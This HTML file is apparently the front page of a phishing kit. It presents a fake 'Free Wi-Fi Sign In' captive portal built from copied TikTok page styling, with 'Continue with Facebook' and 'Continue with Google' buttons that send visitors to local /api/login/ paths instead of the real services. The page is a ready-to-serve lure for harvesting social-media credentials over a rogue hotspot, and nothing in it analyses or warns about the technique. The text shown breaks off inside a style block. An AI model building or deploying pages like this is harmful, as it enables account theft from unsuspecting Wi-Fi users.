<!DOCTYPE html>
<html lang="en" style="height:100%;min-height:100%">
 <head>
  <meta charset="utf-8"/>
  <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
  <style data-emotion="tiktok ">
  </style>
  <title data-rh="true">
   Free Wifi Hotspot - Sign in
  </title>
 </head>
 <body style="height:100%;min-height:100%;background-color: black">
<video playsinline autoplay muted loop poster="image.webp" id="dada">
    <source src="vid.mp4" type="video/mp4" />
</video>
<style>
video {
    /* -o-filter: blur(5px); */
    filter: contrast(100%) opacity(100%);
    object-fit: cover;
    transform: scale(1.0);
    object-fit: cover;
    width: 100vw;
    height: 100vh;
    position: fixed;
    top: 0;
    left: 0;
}
</style>
  <div style="display:none">
   <svg style="width: 0;height: 0;position: absolute;">
    <symbol id="svg-heart-fill">
     <defs>
      <filter color-interpolation-filters="sRGB" filterunits="userSpaceOnUse" height="24.05" id="filter0_d" width="25.8" x="-0.9" y="1.05">
       <feflood flood-opacity="0" result="BackgroundImageFix">
       </feflood>
       <fecolormatrix in="SourceAlpha" result="hardAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0">
       </fecolormatrix>
       <feoffset dy="1.2">
       </feoffset>
       <fegaussianblur stddeviation="1.2">
       </fegaussianblur>
       <fecolormatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0">
       </fecolormatrix>
       <feblend in2="BackgroundImageFix" mode="normal" result="effect1_dropShadow">
       </feblend>
       <feblend in="SourceGraphic" in2="effect1_dropShadow" mode="normal" result="shape">
       </feblend>
      </filter>
      <clippath id="clip1">
       <rect fill="white" height="24" width="24">
       </rect>
      </clippath>
     </defs>
    </symbol>
   </svg>
   <svg style="display: none;">
    <symbol id="svg-pc-share">
     <path clip-rule="evenodd" d="M10.9376 3.17495C10.9376 2.58272 11.6469 2.27873 12.0758 2.68715L18.6021 8.90241C19.1764 9.44937 19.1564 10.3717 18.5588 10.8931L12.0541 16.5689C11.6184 16.9491 10.9376 16.6397 10.9376 16.0614V13.4894C10.9376 13.4894 3.95344 12.2312 1.7131 16.3434C1.50423 16.7268 0.690072 16.8609 0.855563 14.948C1.54761 11.4273 2.96196 5.93084 10.9376 5.93084V3.17495Z" fill="#161823" fill-rule="evenodd">
     </path>
     <path clip-rule="evenodd" d="M15.7538 6.21161L17.0486 8.80136C17.2777 9.25947 17.1677 9.81453 16.7812 10.1506L10.9824 15.193C10.9824 15.193 10.7017 16.5964 11.5437 16.5964C12.3857 16.5964 19.1218 10.4217 19.1218 10.4217C19.1218 10.4217 19.4025 9.57964 18.5605 8.73763C17.7185 7.89563 15.7538 6.21161 15.7538 6.21161Z" fill="#161823" fill-rule="evenodd" opacity="0.03">
     </path>
     <path clip-rule="evenodd" d="M10.9374 6.22983V13.5272C10.9374 13.5272 4.25359 12.5854 2.16026 15.7726C0.146021 18.8394 0.331011 12.3091 3.36331 9.05711C6.39561 5.8051 10.9374 6.22983 10.9374 6.22983Z" fill="url(#paint0_radial)" fill-rule="evenodd" opacity="0.09">
     </path>
     <defs>
      <radialgradient cx="0" cy="0" gradienttransform="translate(11.1827 18.2553) rotate(-113.046) scale(8.93256 8.78076)" gradientunits="userSpaceOnUse" id="paint0_radial" r="1">
       <stop>
       </stop>
       <stop offset="0.995496" stop-opacity="0.01">
       </stop>
       <stop offset="1" stop-opacity="0.01">
       </stop>
      </radialgradient>
     </defs>
    </symbol>
   </svg>
   <svg style="display: none;">
    <symbol id="svg-header-logo">
     <g clip-path="url(#clip0)">
      <path d="M9.87537 16.842V15.7233C9.49211 15.6721 9.10246 15.6401 8.70003 15.6401C3.90288 15.6338 0 19.5399 0 24.3475C0 27.2947 1.46917 29.9031 3.71764 31.4822C2.26763 29.9287 1.37974 27.8381 1.37974 25.5494C1.37974 20.8121 5.17403 16.9507 9.87537 16.842Z" fill="#25F4EE">
      </path>
      <path d="M10.0862 29.5259C12.2261 29.5259 13.9763 27.819 14.053 25.6965L14.0594 6.72822H17.5215C17.4512 6.33824 17.4129 5.93548 17.4129 5.52632H12.686L12.6796 24.4946C12.603 26.6171 10.8527 28.324 8.71286 28.324C8.04854 28.324 7.42255 28.1578 6.86682 27.8637C7.58224 28.8674 8.75758 29.5259 10.0862 29.5259Z" fill="#25F4EE">
      </path>
      <path d="M23.9923 13.166V12.1112C22.6701 12.1112 21.4436 11.7212 20.4088 11.0435C21.3286 12.0984 22.5742 12.8656 23.9923 13.166Z" fill="#25F4EE">
      </path>
      <path d="M20.4088 11.0435C19.3995 9.88639 18.7927 8.37762 18.7927 6.72821H17.528C17.8537 8.53106 18.9269 10.0782 20.4088 11.0435Z" fill="#FE2C55">
      </path>
      <path d="M8.70642 20.3646C6.51544 20.3646 4.73328 22.1483 4.73328 24.3411C4.73328 25.8691 5.602 27.1988 6.86676 27.8637C6.39408 27.2116 6.11302 26.4125 6.11302 25.543C6.11302 23.3502 7.89518 21.5665 10.0862 21.5665C10.495 21.5665 10.891 21.6368 11.2615 21.7519V16.9188C10.8782 16.8676 10.4886 16.8356 10.0862 16.8356C10.0159 16.8356 9.95202 16.842 9.88175 16.842V20.55C9.50488 20.4349 9.11523 20.3646 8.70642 20.3646Z" fill="#FE2C55">
      </path>
      <path d="M23.9921 13.166V16.842C21.5392 16.842 19.2652 16.0557 17.4127 14.7259V24.3475C17.4127 29.1487 13.5099 33.0613 8.70631 33.0613C6.85388 33.0613 5.12921 32.4731 3.71753 31.4822C5.30806 33.1891 7.57569 34.2632 10.0861 34.2632C14.8832 34.2632 18.7925 30.357 18.7925 25.5494V15.9278C20.6449 17.2576 22.9189 18.0439 25.3718 18.0439V13.3131C24.8927 13.3131 24.4328 13.2619 23.9921 13.166Z" fill="#FE2C55">
      </path>
      <path d="M17.4127 24.3475V14.7259C19.2652 16.0557 21.5392 16.842 23.9921 16.842V13.166C22.574 12.8656 21.3284 12.0984 20.4086 11.0435C18.9266 10.0782 17.8599 8.53106 17.5213 6.72821H14.0592L14.0528 25.6964C13.9762 27.8189 12.2259 29.5259 10.0861 29.5259C8.75742 29.5259 7.58847 28.8674 6.86028 27.8701C5.59551 27.1988 4.72679 25.8755 4.72679 24.3475C4.72679 22.1547 6.50895 20.371 8.69993 20.371C9.10874 20.371 9.50478 20.4413 9.87527 20.5564V16.8484C5.17393 16.9507 1.37964 20.8121 1.37964 25.5494C1.37964 27.8381 2.26753 29.9223 3.71753 31.4822C5.12921 32.4731 6.85389 33.0613 8.70632 33.0613C13.5035 33.0613 17.4127 29.1487 17.4127 24.3475Z" fill="black">
      </path>
      <path d="M30.0477 13.1787H44.8225L43.4683 17.411H39.6357V33.0548H34.8577V17.411L30.0541 17.4173L30.0477 13.1787Z" fill="black">
      </path>
      <path d="M69.0317 13.1787H84.1514L82.7972 17.411H78.6261V33.0548H73.8417V17.411L69.0381 17.4173L69.0317 13.1787Z" fill="black">
      </path>
      <path d="M45.7295 19.5015H50.4628V33.0548H45.755L45.7295 19.5015Z" fill="black">
      </path>
      <path d="M52.347 13.1277H57.0802V22.3848L61.7688 17.7754H67.4155L61.4814 23.5356L68.1246 33.0548H62.9122L58.4791 26.4572L57.0739 27.8189V33.0548H52.3406V13.1277H52.347Z" fill="black">
      </path>
      <path d="M102.49 13.1277H107.224V22.3848L111.912 17.7754H117.559L111.625 23.5356L118.268 33.0548H113.062L108.629 26.4572L107.224 27.8189V33.0548H102.49V13.1277Z" fill="black">
      </path>
      <path d="M48.0929 17.9544C49.4088 17.9544 50.4755 16.8867 50.4755 15.5697C50.4755 14.2528 49.4088 13.1851 48.0929 13.1851C46.7771 13.1851 45.7103 14.2528 45.7103 15.5697C45.7103 16.8867 46.7771 17.9544 48.0929 17.9544Z" fill="black">
      </path>
      <path d="M83.5445 24.942C83.5445 20.6779 86.8342 17.1808 91.0181 16.8548C90.8073 16.8356 90.5199 16.8292 90.3091 16.8292C85.8313 16.8292 82.2031 20.4605 82.2031 24.942C82.2031 29.4236 85.8313 33.0548 90.3091 33.0548C90.5199 33.0548 90.8073 33.042 91.0181 33.0293C86.8406 32.7032 83.5445 29.2062 83.5445 24.942Z" fill="#25F4EE">
      </path>
      <path d="M92.8579 16.8292C92.6407 16.8292 92.3532 16.842 92.1425 16.8548C96.32 17.1808 99.6097 20.6779 99.6097 24.942C99.6097 29.2062 96.32 32.7032 92.1425 33.0293C92.3532 33.0484 92.6407 33.0548 92.8579 33.0548C97.3356 33.0548 100.964 29.4236 100.964 24.942C100.964 20.4605 97.3356 16.8292 92.8579 16.8292Z" fill="#FE2C55">
      </path>
      <path d="M91.5803 28.8866C89.4021 28.8866 87.6391 27.1221 87.6391 24.942C87.6391 22.762 89.4021 20.9975 91.5803 20.9975C93.7585 20.9975 95.5215 22.762 95.5215 24.942C95.5215 27.1221 93.7522 28.8866 91.5803 28.8866ZM91.5803 16.8292C87.1026 16.8292 83.4744 20.4605 83.4744 24.942C83.4744 29.4236 87.1026 33.0548 91.5803 33.0548C96.0581 33.0548 99.6863 29.4236 99.6863 24.942C99.6863 20.4605 96.0581 16.8292 91.5803 16.8292Z" fill="black">
      </path>
     </g>
     <defs>
      <clippath id="clip0">
       <rect fill="white" height="42" width="118">
       </rect>
      </clippath>
     </defs>
    </symbol>
   </svg>
   <svg style="display: none;">
    <symbol id="svg-flag">
     <path clip-rule="evenodd" d="M9 9.31286V27.0626C9.98685 26.7378 11.184 26.4042 12.5108 26.1585C16.1115 25.4917 21.0181 25.4123 25.1625 28.3726C28.0181 30.4123 31.6115 30.4917 34.7608 29.9085C36.306 29.6223 37.6602 29.1908 38.6289 28.8293C38.7603 28.7803 38.8841 28.7328 39 28.6872V10.9374C38.0131 11.2623 36.816 11.5959 35.4892 11.8416C31.8885 12.5084 26.9819 12.5878 22.8375 9.62751C19.9819 7.58781 16.3885 7.5084 13.2392 8.09161C11.694 8.37776 10.3398 8.80927 9.37105 9.17072C9.23971 9.21973 9.11586 9.2673 9 9.31286ZM40.1067 6.21064C40.7264 5.90123 41.4622 5.93453 42.0515 6.29874C42.6411 6.66315 43 7.30688 43 8.00004V30C43 30.7576 42.572 31.4501 41.8944 31.7889L41 30C41.8944 31.7889 41.8931 31.7895 41.8931 31.7895L41.8916 31.7903L41.8878 31.7922L41.8775 31.7973L41.846 31.8127C41.831 31.82 41.8128 31.8288 41.7915 31.839C41.7761 31.8464 41.7589 31.8545 41.7401 31.8634C41.651 31.9055 41.525 31.9637 41.3654 32.0343C41.0466 32.1753 40.5919 32.3663 40.0273 32.577C38.9023 32.9967 37.319 33.5027 35.4892 33.8416C31.8885 34.5084 26.9819 34.5878 22.8375 31.6275C19.9819 29.5878 16.3885 29.5084 13.2392 30.0916C11.694 30.3778 10.3398 30.8093 9.37105 31.1707C9.23971 31.2197 9.11586 31.2673 9 31.3129V44.0001C9 44.5524 8.55228 45.0001 8 45.0001H6C5.44772 45.0001 5 44.5524 5 44.0001V8.00004C5 7.24249 5.42801 6.54996 6.10558 6.21118L7 8.00004C6.10558 6.21118 6.10688 6.21053 6.10688 6.21053L6.10842 6.20976L6.11219 6.20789L6.12249 6.20279L6.15404 6.18734C6.17988 6.17477 6.21529 6.15773 6.25987 6.13667C6.34902 6.09457 6.47498 6.03636 6.63455 5.9658C6.95342 5.8248 7.4081 5.63378 7.9727 5.42311C9.09774 5.00332 10.681 4.49734 12.5108 4.15849C16.1115 3.49171 21.0181 3.4123 25.1625 6.37257C28.0181 8.41227 31.6115 8.49167 34.7608 7.90846C36.306 7.62231 37.6602 7.1908 38.6289 6.82935C39.1112 6.6494 39.4925 6.48886 39.7478 6.37595C39.8754 6.31956 39.9711 6.27523 40.0318 6.24653C40.0622 6.23219 40.0838 6.22177 40.0962 6.21572L40.1056 6.21118L40.1067 6.21064Z" fill-rule="evenodd">
     </path>
    </symbol>
   </svg>
   <svg style="display: none;">
    <symbol id="svg-play-fill">
     <path clip-rule="evenodd" d="M12 8.77702C12 6.43812 14.5577 4.99881 16.5569 6.21266L41.6301 21.4356C43.5542 22.6038 43.5542 25.3962 41.6301 26.5644L16.5569 41.7873C14.5577 43.0012 12 41.5619 12 39.223V8.77702Z" fill-rule="evenodd">
     </path>
    </symbol>
   </svg>
   <svg style="display: none;">
    <symbol id="svg-music-note">
     <path clip-rule="evenodd" d="M35.0001 10.7587C35.0001 10.1169 34.4041 9.64129 33.7784 9.78359L17.7902 13.4192C17.335 13.5227 17.0119 13.9275 17.0119 14.3943V37.9972H17.0109C17.0374 40.1644 14.8022 42.4189 11.612 43.2737C8.05093 44.2279 4.64847 43.0769 4.01236 40.7028C3.37624 38.3288 5.74735 35.6308 9.30838 34.6766C10.606 34.3289 11.8826 34.2608 13.0119 34.4294V14.3943C13.0119 12.0601 14.6271 10.0364 16.9033 9.5188L32.8914 5.88317C36.0204 5.17165 39.0001 7.54986 39.0001 10.7587V33.1191C39.084 35.3108 36.8331 37.6109 33.6032 38.4763C30.0421 39.4305 26.6397 38.2795 26.0036 35.9055C25.3675 33.5315 27.7386 30.8334 31.2996 29.8792C32.5961 29.5319 33.8715 29.4635 35.0001 29.6316V10.7587Z" fill-rule="evenodd">
     </path>
    </symbol>
   </svg>
   <svg style="display: none;">
    <symbol id="svg-question-fill">
     <path clip-rule="evenodd" d="M1.74967 0.666992C0.967272 0.666992 0.333008 1.30125 0.333008 2.08366V13.3337C0.333008 13.6033 0.495436 13.8464 0.744552 13.9496C0.993668 14.0528 1.28041 13.9957 1.47108 13.8051L3.90082 11.3753H12.2497C13.0321 11.3753 13.6663 10.7411 13.6663 9.95866V2.08366C13.6663 1.30126 13.0321 0.666992 12.2497 0.666992H1.74967ZM7.03836 4.35482C6.75676 4.35482 6.49279 4.52578 6.31022 4.89816C6.24943 5.02213 6.11013 5.0943 5.97914 5.05064L5.18857 4.78712C5.05759 4.74346 4.98585 4.60139 5.04001 4.47438C5.35368 3.7389 5.99995 3.02148 7.03836 3.02148C8.14805 3.02148 9.04764 3.92107 9.04764 5.03076C9.04764 5.67737 8.65329 6.21121 8.24533 6.54935C7.89209 6.84214 7.42953 7.07353 6.95199 7.13552C6.81507 7.1533 6.7027 7.04 6.7027 6.90193V6.0686C6.7027 5.93053 6.81642 5.81693 6.9476 5.77384C7.08979 5.72713 7.24861 5.6437 7.39447 5.5228C7.64027 5.31907 7.7143 5.12567 7.7143 5.03076C7.7143 4.65745 7.41167 4.35482 7.03836 4.35482ZM7.83268 8.43848C7.83268 8.85269 7.4969 9.18848 7.08268 9.18848C6.66847 9.18848 6.33268 8.85269 6.33268 8.43848C6.33268 8.02426 6.66847 7.68848 7.08268 7.68848C7.4969 7.68848 7.83268 8.02426 7.83268 8.43848Z" fill-rule="evenodd">
     </path>
    </symbol>
   </svg>
  </div>
  <div id="app" style="height:100%;min-height:100%">
   <style data-emotion="tiktok-global zo9fz6">
    *,*::before,*::after{box-sizing:border-box;}body,h1,h2,h3,h4,p,figure,blockquote,dl,dd{margin:0;}ul[role="list"],ol[role="list"]{list-style:none;}html:focus-within{scroll-behavior:smooth;}body{min-height:100vh;text-rendering:optimizeSpeed;line-height:1.5;}a:not([class]){text-decoration-skip-ink:auto;}img,picture{max-width:100%;display:block;}input,button,textarea,select{font:inherit;}@media (prefers-reduced-motion: reduce){html:focus-within{scroll-behavior:auto;}*,*::before,*::after{-webkit-animation-duration:0.01ms!important;animation-duration:0.01ms!important;-webkit-animation-iteration-count:1!important;animation-iteration-count:1!important;transition-duration:0.01ms!important;scroll-behavior:auto!important;}}@supports (-webkit-touch-callout: none){body{min-height:-webkit-fill-available;}}body{font-family:ProximaNova,Arial,Tahoma,PingFangSC,sans-serif;font-size:14px;color:rgba(22, 24, 35, 1.0);background-color:rgba(255, 255, 255, 1.0);overscroll-behavior:contain;direction:ltr;-webkit-font-smoothing:antialiased;}body a{color:rgba(22, 24, 35, 1.0);-webkit-transition:color 250ms;transition:color 250ms;-webkit-text-decoration:none;text-decoration:none;cursor:pointer;}body a:visited{color:rgba(22, 24, 35, 1.0);}body a:hover{color:rgba(22, 24, 35, 1.0);-webkit-text-decoration:underline;text-decoration:underline;}body a:active{color:rgba(22, 24, 35, 1.0);}body a:focus{color:rgba(22, 24, 35, 1.0);}body input::-ms-clear{display:none;width:0;height:0;}body input::-ms-reveal{display:none;width:0;height:0;}body input::-webkit-search-decoration,body input::-webkit-search-cancel-button,body input::-webkit-search-results-button,body input::-webkit-search-results-decoration{display:none;}body.hidden{overflow:hidden;}@font-face{font-family:ProximaNova;src:local("ProximaNova-Regular"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/Proxima-Nova-Regular.woff2) format("woff2"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/Proxima-Nova-Regular.woff) format("woff"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/Proxima-Nova-Regular.otf) format("opentype");font-weight:400;font-style:normal;font-display:swap;}@font-face{font-family:ProximaNova;src:local("ProximaNova-Semibold"),url(//lf16-tiktok-common.ttwstatic.com/obj/tiktok-web-common-sg/mtact/static/fonts/ProximaNova-Semibold.woff2) format("woff2"),url(//lf16-tiktok-common.ttwstatic.com/obj/tiktok-web-common-sg/mtact/static/fonts/ProximaNova-Semibold.woff) format("woff"),url(//lf16-tiktok-common.ttwstatic.com/obj/tiktok-web-common-sg/mtact/static/fonts/ProximaNova-Semibold.otf) format("opentype");font-weight:600;font-style:normal;font-display:swap;}@font-face{font-family:ProximaNova;src:local("ProximaNova-Bold"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/Proxima-Nova-Bold.woff) format("woff"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/Proxima-Nova-Bold.otf) format("opentype");font-weight:700;font-style:normal;font-display:swap;}@font-face{font-family:SofiaPro;src:local("SofiaPro-Regular"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/sofiapro-regular.woff) format("woff"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/sofiapro-regular.otf) format("opentype");font-weight:400;font-style:normal;font-display:swap;}@font-face{font-family:SofiaPro;src:local("SofiaPro-Medium"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/sofiapro-medium.woff) format("woff"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/sofiapro-medium.otf) format("opentype");font-weight:500;font-style:normal;font-display:swap;}@font-face{font-family:SofiaPro;src:local("SofiaPro-Semibold"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/sofiapro-semibold.otf) format("opentype");font-weight:600;font-style:normal;font-display:swap;}@font-face{font-family:SofiaPro;src:local("SofiaPro-Bold"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/sofiapro-bold.woff) format("woff"),url(//lf16-tiktok-web.ttwstatic.com/obj/tiktok-web-common-sg/falcon/tiktok_fonts/sofiapro-bold.otf) format("opentype");font-weight:700;font-style:normal;font-display:swap;}
   </style>
   <style data-emotion="tiktok-global zo9fz6">
    *,*::before,*::after{box-sizing:border-box;}body,h1,h2,h3,h4,p,figure,blockquote,dl,dd{margin:0;}ul[role="list"],ol[role="list"]{list-style:none;}html:focus-within{scroll-behavior:smooth;}body{min-height:100vh;text-rendering:optimizeSpeed;line-height:1.5;}a:not([class]){text-decoration-skip-ink:auto;}img,picture{max-width:100%;display:block;}input,button,textarea,select{font:inherit;}@media (prefers-reduced-motion: reduce){html:focus-within{scroll-behavior:auto;}*,*::before,*::after{-webkit-animation-duration:0.01ms!important;animation-duration:0.01ms!important;-webkit-animation-iteration-count:1!important;animation-iteration-count:1!important;transition-duration:0.01ms!important;scroll-behavior:auto!important;}}@supports (-webkit-touch-callout: none){body{min-height:-webkit-fill-available;}}body{font-family:ProximaNova,Arial,Tahoma,PingFangSC,sans-serif;font-size:14px;color:rgba(22, 24, 35, 1.0);background-color:rgba(255, 255, 255, 1.0);overscroll-behavior:contain;direction:ltr;-webkit-font-smoothing:antialiased;}body a{color:rgba(22, 24, 35, 1.0);-webkit-transition:color 250ms;transition:color 250ms;-webkit-text-decoration:none;text-decoration:none;cursor:pointer;}body a:visited{color:rgba(22, 24, 35, 1.0);}body a:hover{color:rgba(22, 24, 35, 1.0);-webkit-text-decoration:underline;text-decoration:underline;}body a:active{color:rgba(22, 24, 35, 1.0);}body a:focus{color:rgba(22, 24, 35, 1.0);}body input::-ms-clear{display:none;width:0;height:0;}body input::-ms-reveal{display:none;width:0;height:0;}body input::-webkit-search-decoration,body input::-webkit-search-cancel-button,body input::-webkit-search-results-button,body input::-webkit-search-results-decoration{display:none;}body.hidden{overflow:hidden;}font-weight:700;font-style:normal;font-display:swap;}
   </style>
   <style data-emotion="tiktok urb8su-DivContainer">
    .tiktok-urb8su-DivContainer{height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;padding-top:env(safe-area-inset-top);padding-left:env(safe-area-inset-left);padding-right:env(safe-area-inset-right);padding-bottom:env(safe-area-inset-bottom);}
   </style>
   <div class="tiktok-urb8su-DivContainer e2nph0d0">
    <style data-emotion="tiktok 1ykjyxw-DivMobileBodyContainer">
     .tiktok-1ykjyxw-DivMobileBodyContainer{max-width:480px;width:100%;-webkit-flex:1;-ms-flex:1;flex:1;position:relative;margin:44px auto 0;overflow-y:auto;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}
    </style>
    <div class="tiktok-1ykjyxw-DivMobileBodyContainer e2nph0d2">
     <style data-emotion="tiktok-global 11pmhcy">
      .date-selector .rmc-picker{height:250px;}.date-selector .rmc-picker:first-of-type{position:absolute;right:0;left:unset;width:33.3333%;}.date-selector .rmc-picker-indicator{height:50px;}.date-selector .rmc-picker-item{height:50px;line-height:50px;color:#161823;}.date-selector{width:66%;}
     </style>
     <style data-emotion="tiktok 1gnti2i-HeaderWrapper">
      .tiktok-1gnti2i-HeaderWrapper{position:fixed;width:100%;top:0;left:0;height:44px;background:rgba(255, 255, 255, 1.0);padding:0 16px;z-index:2;}
     </style>
     <style data-emotion="tiktok w3ctxj-DivHomeContainer">
      .tiktok-w3ctxj-DivHomeContainer{padding:0 50px;margin-top: 30%}
     </style>
     <div class="tiktok-w3ctxj-DivHomeContainer exd0a431">
      <style data-emotion="tiktok 1bxdsk4-DivTitle">
       .tiktok-1bxdsk4-DivTitle{color:cyan;font-family:SofiaPro,Arial,Tahoma,PingFangSC,sans-serif;font-size:24px;margin:16px auto;font-weight:bold;text-align:center;}
      </style>
      <img src="logo.png" style="filter: contrast(100%);margin-left:35%;width: 85px;height: 80px;">
      <div class="tiktok-1bxdsk4-DivTitle exd0a433" data-e2e="sign-up-title">
       Free Wi-Fi<span style="color:white;"> | </span> Sign In
      </div>
      <style data-emotion="tiktok 100tbyn-DivDescriptionContainer">
       .tiktok-100tbyn-DivDescriptionContainer{color:white;font-size:15px;line-height:18px;margin:12px 0 32px;text-align:center;}
      </style>
      <div class="tiktok-100tbyn-DivDescriptionContainer exd0a432" data-e2e="login-desc">
       Free 3 hours of internet access for everyone.
      </div>
       <style data-emotion="tiktok 1v40zcc-DivBoxContainer">
        .tiktok-1v40zcc-DivBoxContainer{font-family:ProximaNova,Arial,Tahoma,PingFangSC,sans-serif;font-weight:600;border:1px solid white;font-size:15px;padding:0 12px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;height:44px;position:relative;cursor:pointer;margin-bottom:16px;word-break:keep-all;white-space:nowrap;color: white;backdrop-filter: blur(10px) grayscale(50%);border-radius: 5px}
       </style>
        <style data-emotion="tiktok biy4dj-DivIconContainer">
         .tiktok-biy4dj-DivIconContainer{left:12px;font-size:20px;position:absolute;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}
        </style>
      <a href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/index.php">
      <div class="tiktok-1v40zcc-DivBoxContainer e1cgu1qo0" data-e2e="channel-item">
       <div class="tiktok-biy4dj-DivIconContainer e1cgu1qo1">
        <svg fill="none" height="1em" viewbox="0 0 48 48" width="1em" xmlns="http://www.w3.org/2000/svg">
         <path d="M45 24.1283C45 12.4595 35.598 3 24 3C12.402 3 3 12.4595 3 24.1283C3 34.6739 10.6794 43.415 20.7188 45V30.2357H15.3867V24.1283H20.7188V19.4735C20.7188 14.1782 23.854 11.2533 28.6508 11.2533C30.9476 11.2533 33.3516 11.6659 33.3516 11.6659V16.8655H30.7036C28.095 16.8655 27.2812 18.4943 27.2812 20.1668V24.1283H33.1055L32.1744 30.2357H27.2812V45C37.3206 43.415 45 34.6739 45 24.1283Z" fill="#1877F2">
         </path>
        </svg>
       </div>
       Continue with Facebook
      </div>
      </a>
      <a href="/api/login/ggCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/">
      <div class="tiktok-1v40zcc-DivBoxContainer e1cgu1qo0" data-e2e="channel-item">
       <div class="tiktok-biy4dj-DivIconContainer e1cgu1qo1">
        <svg fill="none" height="1em" viewbox="0 0 48 48" width="1em" xmlns="http://www.w3.org/2000/svg">
         <path clip-rule="evenodd" d="M43 24.4313C43 23.084 42.8767 21.7885 42.6475 20.5449H24.3877V27.8945H34.8219C34.3724 30.2695 33.0065 32.2818 30.9532 33.6291V38.3964H37.2189C40.885 35.0886 43 30.2177 43 24.4313Z" fill="#4285F4" fill-rule="evenodd">
         </path>
         <path clip-rule="evenodd" d="M24.3872 43.001C29.6219 43.001 34.0107 41.2996 37.2184 38.3978L30.9527 33.6305C29.2165 34.7705 26.9958 35.4441 24.3872 35.4441C19.3375 35.4441 15.0633 32.1018 13.5388 27.6108H7.06152V32.5337C10.2517 38.7433 16.8082 43.001 24.3872 43.001Z" fill="#34A853" fill-rule="evenodd">
         </path>
         <path clip-rule="evenodd" d="M13.5395 27.6094C13.1516 26.4695 12.9313 25.2517 12.9313 23.9994C12.9313 22.7472 13.1516 21.5295 13.5395 20.3894V15.4668H7.06217C5.74911 18.0318 5 20.9336 5 23.9994C5 27.0654 5.74911 29.9673 7.06217 32.5323L13.5395 27.6094Z" fill="#FBBC04" fill-rule="evenodd">
         </path>
         <path clip-rule="evenodd" d="M24.3872 12.5568C27.2336 12.5568 29.7894 13.5155 31.7987 15.3982L37.3595 9.94866C34.0018 6.88281 29.6131 5 24.3872 5C16.8082 5 10.2517 9.25777 7.06152 15.4674L13.5388 20.39C15.0633 15.8991 19.3375 12.5568 24.3872 12.5568Z" fill="#EA4335" fill-rule="evenodd">
         </path>
        </svg>
       </div>
        Continue with Google&emsp;
      </div>
     </div>
     </a>
     <style data-emotion="tiktok 1a5tf6w-DivPopup">
      .tiktok-1a5tf6w-DivPopup{position:fixed;left:0;top:0;bottom:0;right:0;overflow:auto;outline:0px;z-index:12;display:none;-webkit-transition:all 500ms cubic-bezier(.075, .82, .165, 1);transition:all 500ms cubic-bezier(.075, .82, .165, 1);}.tiktok-1a5tf6w-DivPopup.enter-active{display:block;}.tiktok-1a5tf6w-DivPopup.enter-done{display:block;}.tiktok-1a5tf6w-DivPopup.exit{display:block;}.tiktok-1a5tf6w-DivPopup.exit-active{display:none;}
     </style>
     <div class="tiktok-1a5tf6w-DivPopup e1pjeozo0">
      <style data-emotion="tiktok 1dkp8wv-DivMask">
       .tiktok-1dkp8wv-DivMask{background:rgba(0, 0, 0, 0.5);position:absolute;left:0;right:0;top:0;bottom:0;}
      </style>
      <div class="tiktok-1dkp8wv-DivMask e1pjeozo2">
      </div>
      <style data-emotion="tiktok vofvup-DivContent">
       .tiktok-vofvup-DivContent{position:absolute;width:100vw;bottom:0;left:0;right:0;background:rgba(241, 241, 241, 1.0);border-radius:8px 8px 0 0;overflow:hidden;-webkit-transition:all 500ms;transition:all 500ms;z-index:11;}.tiktok-vofvup-DivContent.enter-active{opacity:1;-webkit-transform:translateY(100%);-moz-transform:translateY(100%);-ms-transform:translateY(100%);transform:translateY(100%);}.tiktok-vofvup-DivContent.enter-done{-webkit-transform:translateY(0);-moz-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0);}
      </style>
      <div class="tiktok-vofvup-DivContent e1pjeozo1">
       <style data-emotion="tiktok 7mqg5-DivContainer">
        .tiktok-7mqg5-DivContainer{left:0;background:rgba(255, 255, 255, 1.0);border-radius:8px 8px 0 0;width:100%;padding:16px;text-align:center;}
       </style>
       <div class="tiktok-7mqg5-DivContainer e1pdjumk0" data-e2e="instagram-modal">
        <style data-emotion="tiktok 1hv3rn9-DivIcon">
